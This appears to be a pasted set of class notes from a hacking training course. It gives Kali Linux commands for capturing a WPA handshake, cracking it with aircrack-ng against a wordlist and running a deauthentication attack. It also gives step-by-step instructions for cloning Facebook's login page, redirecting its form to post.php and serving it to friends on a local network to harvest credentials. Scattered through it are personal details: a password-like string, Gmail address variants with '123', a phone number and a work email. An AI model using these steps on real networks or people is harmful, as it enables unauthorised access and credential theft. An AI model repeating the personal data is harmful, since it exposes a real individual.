· 9 years ago · Oct 25, 2016, 11:06 AM
1Wireless Security:
2
31991- wlan- wireless local area network
4
5Security:
6
7WEP -1997
8Wired Equivalent Privacy
9DES Encryption
10Very easy to crack. 64 or 128 bit encryption
11
12palvinder -> a312@65!(htf&$
13
14WPA- Wifi Protected Access 2003
15AES Encryption
16
17WPA/2 2004
18AES/CCMP
19
20ALmost impossible to crack directly.
21but we are having some indirect methods.
22
23
24Some Important:
25
26ESSID/SSID- Name of the network
27
28BSSID- Physical Address or Mac address of Access Point.
29
30Clients: Phone, Laptop, Ipads etc, which is enjoying facility of wifi.
31
32Handshake- Having a connection with wifi router by having some geuine password to use internet
33
34Channels- a frequency over which comunication is occuring between client and wifi roouter.
35Chaneel in India: 1-13
36
37Wikipedia- wlan channels
38
39Step in Kali Linux:
40
41Step 1: Check interface name:
42#ifconfig
43
44Step 2: Make interface on Monitor mode:
45# airmon-ng start wlan0
46
47Step 3: Dump all network:
48# airodup-ng wlan0mon
49
50Step 4: Dump target packets and store in abc file
51# airodump-ng --bssid a:b:c:d -c 11 -w abc wlan0mon
52
53Step 5: After handshake got captured:
54# aircrack-ng abc-01.cap -w /wordlist.txt
55
56Password Found :)
57
58For Deauth Attack:
59# aireplay-ng --deauth 0 -a a:b:c:d wlan0mon
60//This will deauth all clients connected with a:b:c:d
61
62
63Gmail.com
64
65palvinder91@gmail.com // 123
66
67pal.vinder91@gmail.com // 123
68
69palv.inder91@gmail.com // 123
70
71pal.v.inder91@gmail.com // 123
72
73p.alvinder.91@gmail.com // 123
74
75p.a.l.v.i.n.d.e.r91@gmail.com // 123
76
77palvinder91@ymail.com
78
79Gmail Security:
80
811. ALternate Id/ Alias/ Email id's
82
832. Recovery Id
84
85Phishing Attacks:
86
87Phishing is a fraudulent attempt, usually made through email, phone calls, SMS etc seeking your personal and confidential information.
88
89How these pages are built:
90
91Step 1: Open Genuine Page:
92
93www.facebook.com
94
95Step 2: Right click -> Save Page as -> Index.html
96
97Step 3: Open index.html with Notepad.
98
99Step 4: Search for word "action="
100
101Step 5: Change in between inverted comma and type "post.php"
102
103Step 6: Save notepad file.
104
105Step 7: Paste post.php file in same folder
106
107Creating LAN Server: Xampp server
108
109https://www.apachefriends.org/download.html
110
111Step 8: After installing Xampp open it.
112 Start Apache and Mysql
113
114Step 9; Copy facebook folder and paste it in:
115
116 C:/xampp/htdocs/
117
118Step 10: check ur ip -> cmd -> ipconfig -> 192.168.0.12
119
120Share this link with ur frds in same network:
121
122192.168.0.12/facebook/
123
124192.168.43.59/facebook
125
126JUst check ur facebook folder of htdocs
127
128Trojan: A malware file, which when executed on system, which provides complete access of ur system to someone else/
129
130www.lucideustraining.com
131www.tinyurl.com/securedigitalindia
132 google -> lucidues -> write a review.
133
134
135 Hitesh: 9717083090
136
137 palvinder.s@lucideustech.com